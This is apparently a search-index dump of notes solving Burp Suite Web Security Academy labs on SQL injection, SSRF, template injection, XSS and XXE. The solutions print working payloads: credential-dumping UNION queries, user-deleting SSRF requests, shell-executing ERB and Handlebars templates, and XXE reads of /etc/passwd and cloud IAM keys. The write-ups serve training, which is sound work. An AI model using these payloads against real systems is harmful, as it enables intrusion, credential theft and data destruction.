data","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation","title":"Enuntiation","text":"

                            This lab contains an\u00a0SQL injection\u00a0vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

                            SELECT * FROM products WHERE category = 'Gifts' AND released = 1

                            To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution","title":"Solution","text":"

                            Filter by one of the categories and, in the URL, instead of that category, after the \"=\" add:

                            ' OR '1'='1\n
                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-allowing-login-bypass","title":"SQL injection vulnerability allowing login bypass","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_1","title":"Enuntiation","text":"

                            This lab contains an\u00a0SQL injection\u00a0vulnerability in the login function.

                            To solve the lab, perform an SQL injection attack that logs in to the application as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_1","title":"Solution","text":"

                            In the login page, add to username:

                            administrator'--\n

                            It doesn't matter what you enter in the password field.
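
                            For intuition, assuming a typical login query, the comment sequence cuts off the password check:

                            SELECT * FROM users WHERE username = 'administrator'--' AND password = '...'\n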

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query","title":"SQL injection UNION attack, determining the number of columns returned by the query","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_2","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

                            To solve the lab, determine the number of columns returned by the query by performing an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing null values.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_2","title":"Solution","text":"

                            In the category filter, filter by 'Gifts'. Then, in the URL, substitute Gifts with:

                            ' OR '1'='1' order by 1-- -\n' OR '1'='1' order by 2-- -\n' OR '1'='1' order by 3-- -\n' OR '1'='1' order by 4-- -\n

                            Substituting the last string produces an error. Bingo! Our last successful try was order by 3, so the query returns 3 columns. Now we can launch our UNION attack:

                            ' OR '1'='1' UNION SELECT all  null,null,null-- -\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-finding-a-column-containing-text","title":"SQL injection UNION attack, finding a column containing text","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_3","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a\u00a0previous lab. The next step is to identify a column that is compatible with string data.

                            The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_3","title":"Solution","text":"

                            In the lab's home page, filter by the 'Gifts' category.

                            In the URL, substitute Gifts with the following string:

                            ' UNION SELECT null,null,null-- -\n

                            The lab displays a string of characters at the top of the screen that you need to get reflected in the response in order to pass the lab. In my case it was the string 'FEvLOw'. Trying that string in different positions, I got a success in the second position:

                            '+UNION+SELECT+'FEvLOw',NULL,NULL--\n'+UNION+SELECT+NULL,'FEvLOw',NULL--\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-data-from-other-tables","title":"SQL injection UNION attack, retrieving data from other tables","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_4","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

                            The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

                            To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_4","title":"Solution","text":"

                            First, we test the number of columns and obtain 2.
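
                            (As in the previous labs, a sketch of the column-count test:)

                            ' UNION SELECT ALL NULL,NULL-- -\n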

                            Then we run:

                            ' UNION SELECT ALL username,password FROM users-- -\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-multiple-values-in-a-single-column","title":"SQL injection UNION attack, retrieving multiple values in a single column","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_5","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

                            The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

                            To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_5","title":"Solution","text":"

                            As in the previous lab, we first test how many columns there are:

                            ' UNION SELECT ALL NULL,NULL-- -\n

                            After that, we check which column is reflected (in my case, the second one) and use it to retrieve the usernames and, later, the passwords:

                            ' UNION SELECT NULL,username FROM users-- -\n

                            And we get:

                            carlos\nadministrator\nwiener\n

                            And then, passwords:

                            ' UNION SELECT NULL,password FROM users-- -\n

                            And we get the passwords; log in as administrator with the retrieved password to solve the lab.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-attack-querying-the-database-type-and-version-on-oracle","title":"SQL injection attack, querying the database type and version on Oracle","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_6","title":"Enuntiation","text":"

                            This lab contains a\u00a0SQL injection\u00a0vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

                            To solve the lab, display the database version string.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_6","title":"Solution","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-ssrf/","title":"BurpSuite Labs - Server Side Request Forgery","text":"

                            https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#payloads-with-localhost

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-the-local-server","title":"Basic SSRF against the local server","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution","title":"Solution","text":"
                            POST /product/stock HTTP/2\nHost: 0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nCookie: session=nQDGMiUWrUCVsa4ZXP4RoToYgd4biWt5\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nOrigin: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http%3A%2F%2Flocalhost%2Fadmin%2Fdelete?username=carlos\n
                            1. Browse to /admin and observe that you can't directly access the admin page.
                            2. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
                            3. Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
                            4. Read the HTML to identify the URL to delete the target user, which is:

                              http://localhost/admin/delete?username=carlos

                            5. Submit this URL in the stockApi parameter to deliver the SSRF attack.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-another-back-end-system","title":"Basic SSRF against another back-end system","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_1","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_1","title":"Solution","text":"

                            Launch a scan request with Intruder:

                            POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 96\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.\u00a71\u00a7:8080/admin/\n

                            Now we know that the address is http://192.168.0.16:8080/admin/, so we can send the delete request for user carlos.

                            POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.16:8080/admin/delete?username=carlos\n

                            1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Intruder.
                            2. Click \"Clear \u00a7\", change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click \"Add \u00a7\".
                            3. Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the \"From\", \"To\", and \"Step\" boxes respectively.
                            4. Click \"Start attack\".
                            5. Click on the \"Status\" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
                            6. Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos
                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-blacklist-based-input-filters","title":"SSRF with blacklist-based input filters","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_2","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

                            The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_2","title":"Solution","text":"
                            POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin\n

                            Now we know which filter bypasses we need:

                            • 127.1 instead of 127.0.0.1
                            • double URL encoding of the \"a\" character in the word 'admin' (\"a\" encodes to %61; percent-encoding each of those characters again yields %25%36%31)

                            With these, we can send the delete request for user carlos.

                            POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin/%25%36%34elete?username=carlos\n

                            1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
                            2. Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.
                            3. Bypass the block by changing the URL to: http://127.1/
                            4. Change the URL to http://127.1/admin and observe that the URL is blocked again.
                            5. Obfuscate the \"a\" by double-URL encoding it to %2561 to access the admin interface and delete the target user.
                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-filter-bypass-via-open-redirection-vulnerability","title":"SSRF with filter bypass via open redirection vulnerability","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_3","title":"Enunciation","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssti/","title":"BurpSuite Labs - Server Side Template Injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection","title":"Basic server-side template injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

                            To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution","title":"Solution","text":"

                            Identify an injection point.

                            Test a template injection. From the enunciation we know the engine is ERB.

                            We run a whoami beforehand, then list the root directory \"/\" and \"/home/carlos\", and finally delete the morale.txt file.
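
                            Sketches of the ERB payloads matching those steps (standard Ruby calls; the file path comes from the lab description):

                            <%= system(\"whoami\") %>\n<%= Dir.entries(\"/\") %>\n<%= Dir.entries(\"/home/carlos\") %>\n<%= File.delete(\"/home/carlos/morale.txt\") %>\n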

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection-code-context","title":"Basic server-side template injection (code context)","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_1","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_1","title":"Solution","text":"

                            Afterwards, you need to visit the endpoint where the template gets rendered and the code executes.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-using-documentation","title":"Server-side template injection using documentation","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_2","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-an-unknown-language-with-a-documented-exploit","title":"Server-side template injection in an unknown language with a documented exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_3","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and find a documented exploit online that you can use to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_3","title":"Solution","text":"

                            Find the injection point and identify the template engine from the stack traces:

                            Search the web for \"Handlebars server-side template injection\". You should find a well-known exploit posted by\u00a0@Zombiehelp54.

                            URL-encode this payload to solve the lab:

                            {{#with \"s\" as |string|}}\n    {{#with \"e\"}}\n        {{#with split as |conslist|}}\n            {{this.pop}}\n            {{this.push (lookup string.sub \"constructor\")}}\n            {{this.pop}}\n            {{#with string.split as |codelist|}}\n                {{this.pop}}\n                {{this.push \"return require('child_process').exec('rm /home/carlos/morale.txt');\"}}\n                {{this.pop}}\n                {{#each conslist}}\n                    {{#with (string.sub.apply 0 codelist)}}\n                        {{this}}\n                    {{/with}}\n                {{/each}}\n            {{/with}}\n        {{/with}}\n    {{/with}}\n{{/with}}  \n
                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-information-disclosure-via-user-supplied-objects","title":"Server-side template injection with information disclosure via user-supplied objects","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_4","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.

                            To solve the lab, steal and submit the framework's secret key.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_4","title":"Solution","text":"

                            Read the documentation about the SECRET_KEY setting in the Django documentation: https://docs.djangoproject.com/en/5.0/ref/settings/#secret-key
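
                            A minimal sketch of the usual approach, assuming the engine turns out to be Django Templates (confirm this in your own lab): use the built-in debug tag to enumerate accessible objects, then read the key from the settings object and submit it.

                            {% debug %}\n{{ settings.SECRET_KEY }}\n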

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-a-sandboxed-environment","title":"Server-side template injection in a sandboxed environment","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_5","title":"Enunciation","text":"

                            This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox. To solve the lab, break out of the sandbox to read the file\u00a0my_password.txt\u00a0from Carlos's home directory. Then submit the contents of the file.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_6","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#warning","title":"Warning","text":"

                            As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit_1","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_7","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            Warning

                            As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-xss/","title":"BurpSuite Labs - Cross-site Scripting","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#reflected-xss-into-html-context-with-nothing-encoded","title":"Reflected XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation","title":"Enuntiation","text":"

                            This lab contains a simple\u00a0reflected cross-site scripting\u00a0vulnerability in the search functionality.

                            To solve the lab, perform a cross-site scripting attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution","title":"Solution","text":"

                            Copy and paste the following into the search box:

                            <script>alert(1)</script>\n

                            Click Search.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#stored-xss-into-html-context-with-nothing-encoded","title":"Stored XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_1","title":"Enuntiation","text":"

                            This lab contains a\u00a0stored cross-site scripting\u00a0vulnerability in the comment functionality.

                            To solve this lab, submit a comment that calls the\u00a0alert\u00a0function when the blog post is viewed.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_1","title":"Solution","text":"

                            Go to a post, and in the comment box enter:

                            <script>alert(1)</script>\n

                            Once you go back to the post, the script will load.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-documentwrite-sink-using-source","title":"DOM XSS in\u00a0document.write\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_2","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search query tracking functionality. It uses the JavaScript\u00a0document.write\u00a0function, which writes data out to the page. The\u00a0document.write\u00a0function is called with data from\u00a0location.search, which you can control using the website URL.

                            To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_2","title":"Solution","text":"

                            Use the search box to look for some alphanumeric characters and see where in the response those characters are reflected. In this case, it was in an image:

                            Now, escape those characters. For instance with:

                            \"><SCRIPT>alert(1)</sCripT>\n
                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-innerhtml-sink-using-source","title":"DOM XSS in\u00a0innerHTML\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_3","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search blog functionality. It uses an\u00a0innerHTML\u00a0assignment, which changes the HTML contents of a\u00a0div\u00a0element, using data from\u00a0location.search.

                            To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_3","title":"Solution","text":"

                            Reviewing my notes, a good proof of concept for DOM-based XSS can be found at swisskyrepo/PayloadsAllTheThings.

                            An extensive XSS payload list is also available from Payloadbox, but it's hard to tell which hits are true positives; for this lab you will end up with a list of 124 possible payloads.

                            To solve the lab, enter in the searchbox:

                            #\"><img src=/ onerror=alert(2)>\n

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-anchor-href-attribute-sink-using-locationsearch-source","title":"DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_4","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the submit feedback page. It uses the jQuery library's\u00a0$\u00a0selector function to find an anchor element, and changes its\u00a0href\u00a0attribute using data from\u00a0location.search.

                            To solve this lab, make the \"back\" link alert\u00a0document.cookie.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_4","title":"Solution","text":"

                            On the home page, pay attention to the \"Submit feedback\" link: it points to /feedback?returnpath=/.

                            Append javascript:alert(document.cookie) to the returnpath parameter so that the final href attribute is:

                            /feedback?returnpath=/javascript:alert(document.cookie)\n

                            Click on Submit feedback.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-selector-sink-using-a-hashchange-event","title":"DOM XSS in jQuery selector sink using a hashchange event","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_5","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability on the home page. It uses jQuery's\u00a0$()\u00a0selector function to auto-scroll to a given post, whose title is passed via the\u00a0location.hash\u00a0property.

                            To solve the lab, deliver an exploit to the victim that calls the\u00a0print()\u00a0function in their browser.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_5","title":"Solution","text":"

                            Copied from Burpsuite:

                            1. Notice the vulnerable code on the home page using Burp or the browser's DevTools.
                            2. From the lab banner, open the exploit server.
                            3. In the\u00a0Body\u00a0section, add the following malicious\u00a0iframe:

                              <iframe src=\"https://YOUR-LAB-ID.web-security-academy.net/#\" onload=\"this.src+='<img src=x onerror=print()>'\"></iframe> 4. Store the exploit, then click\u00a0View exploit\u00a0to confirm that the\u00a0print()\u00a0function is called. 5. Go back to the exploit server and click\u00a0Deliver to victim\u00a0to solve the lab

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xxe/","title":"BurpSuite Labs - XML External Entity XXE","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-using-external-entities-to-retrieve-files","title":"Exploiting XXE using external entities to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

                            To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-perform-ssrf-attacks","title":"Exploiting XXE to perform SSRF attacks","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_1","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

                            The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

                            To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_1","title":"Solution","text":"

                            Capture the check stock request:

                            Perform the data exfiltration by chaining XXE and SSRF. The response will display the next folder that needs to be added to the request:

                            # Burpsuite solution\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the response from the metadata endpoint, which will initially be a folder name.\n4. Iteratively update the URL in the DTD to explore the API until you reach `/latest/meta-data/iam/security-credentials/admin`. This should return JSON containing the `SecretAccessKey`.\n
